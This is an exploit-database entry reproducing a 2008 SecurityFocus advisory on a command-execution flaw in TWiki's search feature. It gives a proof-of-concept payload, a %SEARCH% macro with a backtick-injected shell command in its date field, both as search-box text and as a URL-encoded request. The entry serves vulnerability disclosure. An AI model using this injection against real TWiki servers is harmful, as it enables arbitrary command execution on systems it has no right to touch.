header-logo
Suggest Exploit
vendor:
TWiki
by:
SecurityFocus
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: TWiki
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TWiki Command Execution Vulnerability

TWiki is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input. Successful attacks can compromise the affected application and possibly the underlying computer. Enter the following in the application's search box: %SEARCH{ date="P`pr -?`" search="xyzzy" }%

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/32668/info

TWiki is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer. 

Enter the following in the application's search box:
%SEARCH{ date="P`pr -?`" search="xyzzy" }%

http://www.example.com/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all

Navigation

Suggest Exploit

Services By CQR